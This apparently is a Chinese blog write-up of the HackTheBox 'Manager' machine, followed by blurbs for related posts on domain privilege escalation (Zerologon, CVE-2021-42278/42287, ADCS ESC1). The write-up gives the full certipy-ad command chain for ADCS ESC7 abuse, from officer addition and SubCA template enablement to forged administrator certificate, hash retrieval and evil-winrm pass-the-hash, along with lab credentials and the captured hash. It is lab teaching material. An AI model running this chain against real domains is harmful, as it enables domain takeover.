在这里插入图片描述

用户在Certificate Service DCOM Access(证书服务DCOM访问)组中

使用certipy-ad检测一下有没有漏洞

certipy-ad find  -vulnerable -stdout -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236

在这里插入图片描述

ESC7 是指用户拥有CA 的访问权限Manage CAManage Certificates没有公共技术可以滥用Manage Certificates访问权限来进行域权限升级,但可以使用它来颁发或拒绝待处理的证书请求。

为用户添加新的权限来授予自己的Manage Certificates访问权限。

certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'

在这里插入图片描述

可以使用SubCA参数在CA上启用-enable-template模板。

certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123'

在这里插入图片描述

我们可以首先根据SubCA模板请求证书。该请求将被拒绝,但我们将保存私钥并记下请求 ID

certipy-ad req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn 'administrator@manager.htb'

在这里插入图片描述

通过我们的Manage CA和,我们使用命令和参数Manage Certificates发出失败的证书请求。第三名第四名

certipy-ad ca -ca 'manager-DC01-CA' -issue-request 16 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'

在这里插入图片描述

最后,我们可以使用req命令和-retrieve <request ID>参数来发出检索的证书。

certipy-ad req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -retrieve 16

在这里插入图片描述

通过证书传递攻击(PTC) 使用创建的证书生成管理员hash。

certipy-ad auth -pfx administrator.pfx -username administrator -domain manager.htb -dc-ip 10.10.11.236

遇到这个报错就开启python虚拟化环境,可能会下载venv直接下载就行了

python -m venv /home/kali/name
source /home/kali/name/bin/activate

在这里插入图片描述

遇到这个报错就同步服务器时间

rdate -n 10.10.11.236

在这里插入图片描述

一直重复最后的命令,直到出现hash

在这里插入图片描述

aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

使用evil-winrm进行hash登录administrator拿到flag

evil-winrm -i 10.10.11.236 -u administrator -H 'ae5064c2f62317332c88629e025924ef'

在这里插入图片描述

6281dcd0ecc5c42a28d94eea077254f7
强少张
关注
专栏目录
CVE-2020-1472 提权利用(提权
墨痕诉清风的博客
01-25 2354
控(Win2008):192.168.199.131 用户(Win7):192.168.199.128 用户(Win03):192.168.199.129 漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472 利用+重置工具:https://github.com/risksense/zerologon 重置hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472 工具运行环境:https://.
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
热门推荐
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
简单的内的提权
最新发布
m0_74326506的博客
07-11 2032
42287:微软规定一台机器的机器账号名以$结尾,但又没有做验证,所以一台机器叫dc的话,可以创建有着机器账户属性的dc账户44278:用dc账户向AS申请TGT票据后,然后去向TGS申请ST,在申请ST的时候删除dc这个账户,那么KDC在验证时就查不到dc这个账户,进而查到dc$这个账户,于是就将ST颁给dc¥这个账户。
CVE-2020-1472(提权)
p01son的博客
08-02 694
CVE-2020-1472(提权) Created: July 7, 2021 5:25 PM 文章目录CVE-2020-1472(提权)简介影响范围复现环境复现过程恢复原机器hash参考 简介 CVE-2020-1472是一个windows控中严重的远程权限提升漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的
CVE-2020-1472 提权
Adminxe的博客
12-29 2403
0x00 测试环境 DC(WIN-ENS2VR5TR3N):192.168.183.130 攻击机器:192.168.183.129 0x01 对控进行测试漏洞是否存在 python3 zerologon_tester.py WIN-ENS2VR5TR3N 192.168.183.130 0x02 使用zerologon工具将控密码打成空 (这里打空的用户是控所在机器的账户,并不是控账户。) python3 set_empty_pw DC_NETBIOS_NAME DC_I..
环境权限提升
2301_76786857的博客
01-18 1331
权限提升是指攻击者利用操作系统或软件应用程序中的漏洞、设计缺陷或配置疏忽,让应用或用户获得对受保护资源的高级访问权限。 攻击者成为用户之后,若想要完全控制该,需要进行权限提升,即成为管理员,以管理员身份进行进一步的操作。可以通过中间人攻击、不安全的凭证等操作进行权限的提升。
T-HTB manager-开源
05-03
T-HTB免费网络界面,内置PHP,简单的Java脚本,Ajax,嵌套集模型MySQL,rrd图,使用iptables创建tc命令CLASSIFY
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
htb
02-18
【标题】:“htb”通常指的是“Hack The Box”,这是一个在线平台,专注于网络安全教育,特别是渗透测试和道德黑客技能的提升。在这个平台上,用户可以挑战各种虚拟机(VMs),这些VM代表了不同级别的安全防护,模拟...
ROS 6M单线 HTB+L7+DSCP+PCQ 全分离策略
04-09
在给定的"ROS 6M单线 HTB+L7+DSCP+PCQ 全分离策略"中,涉及了网络流量控制和分类的多个核心概念,主要包括HTB(Hierarchical Token Bucket)、L7(Layer 7 Filter)、DSCP(Differentiated Services Code Point)和...
网络攻防|CVE-2021-42287、CVE-2021-42278提权
weixin_42282189的博客
12-20 2669
作者: r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 漏洞原理 Microsoft Windows Active Directory 服务权限提升漏洞(CVE-2021-42278、CVE-2021-42287)攻击者可利用该漏洞将内的普通用户权限提升到管理员权限,造成风险和危害极大。 漏洞情报来源: 1、影响版本 CVE-2021-42278 ○ Windows Server 2012 R2 ○ Windows Server 2012 (S.
[内网渗透]—NetLogon 提权漏洞(CVE-2020-1472)
Sentiment的博客
12-16 642
CVE-2020-1472 是⼀个 windows 控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与控间易受攻击的安全通道时,可利⽤此漏洞获取管访问权限(将控中保存在AD中的管理员password设置为空);其漏洞原理是发⽣在 RPC 认证过程的过程中,由于错误的使⽤了 AES-CFB8 加密所致。获取了一个加入了的计算机权限,在普通账号的情况下,将管密码置空,导出管hash,然后进行连接。
[内网渗透]—kerberos&提权(pth、wmic)
Sentiment的博客
12-08 534
在 Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。在渗透过程中 Kerberos 协议的攻防也是很重要的存在。Kerberos 主要是用在环境下的身份认证协议。PsExec是SysInternals套件中的一款强大的软件。
渗透笔记-ADCS 提权-ESC1
NoooEmotion的博客
02-02 1760
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
环境提权姿势
懂进攻知防守
08-15 1355
Netlogon权限提升2020年08月12日, 微软官方发布了 NetLogon 特权提升漏洞 的风险通告。攻击者通过NetLogon(MSNRPC),建立与控间易受攻击的安全通道时,可利用此漏洞获取管访问权限。成功利用此漏洞的攻击者。可以在该网络中的设备上运行经特殊设计的应用程序。......
提权之CVE-2021-42278漏洞复现
一只爱吃橙子的羊
11-21 1392
提权CVE-2021-42278漏洞复现,本文仅为验证漏洞,在本地环境测试验证,无其它目的。
[渗透测试学习] Manager - HackTheBox
rev1ve的博客
12-25 1202
扫出来很多端口,其中80端口有http服务,88端口是采用一个身份验证协议kerberos,以及NetBIOS-SSN(端口139)和Microsoft-DS(端口445)都与SMB有关。如果我们已经满足了此攻击的先决条件,我们可以首先请求基于 SubCA 模板的证书。如果您只有“管理 CA”访问权限,则可以通过将您的用户添加为新官员来授予自己“管理证书”访问权限。但是会出现报错,重要的是通过与Kerberos同步时间来解决这些错误。通过管理 CA 和管理证书,我们可以使用 ca 命令和。
HTB APT靶机渗透测试流程
RemedyVI的博客
07-26 646
通过rpcmap枚举135端口rpc服务的UUID和操作数,通过nday漏洞远程获取IPv6地址,重新端口扫描,通过开放的smb服务端口拿到backup.zip文件,破解拿到ntds.dit和SYSTEM,利用secretsdump获取用户信息,筛选出有用信息后利用getTGT进行密码喷洒拿到henry.vinson用户的密码hash,但是权限不足或有WAF拿不到shell。
内网渗透:七、windows组策略首选项提权
liu_jia_liang的博客
03-01 2690
一、sysvol目录 SYSVOL是所有经过身份验证的用户具有读访问权限的Active Directory中的范围共享。SYSVOL是指存储公共文件服务器副本的共享文件夹,它们在中所有的控制器之间复制。 Sysvol文件夹是安装AD时创建的,它用来存放GPO、Script等信息。同时,存放在Sysvol文件夹中的信息,会复制到中所有DC上。SYSVOL包含登录脚本,组策略数据以及需要在任何有控制器的任何地方可用的其他范围数据(因为SYSVOL在所有控制器之间自动同步并共享)。所有...
ROS双线HTB+PCQ流量控制指南
"ROS双线HTB+PCQ手册是一份详细的操作指南,主要针对ROS (RouterOS) 系统中的双线流量控制技术,包括HTB(Hierarchy Token Bucket)和PCQ(Priority Queue)。这份手册适用于ROS 3.30及4.x版本,旨在帮助用户理解和配置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值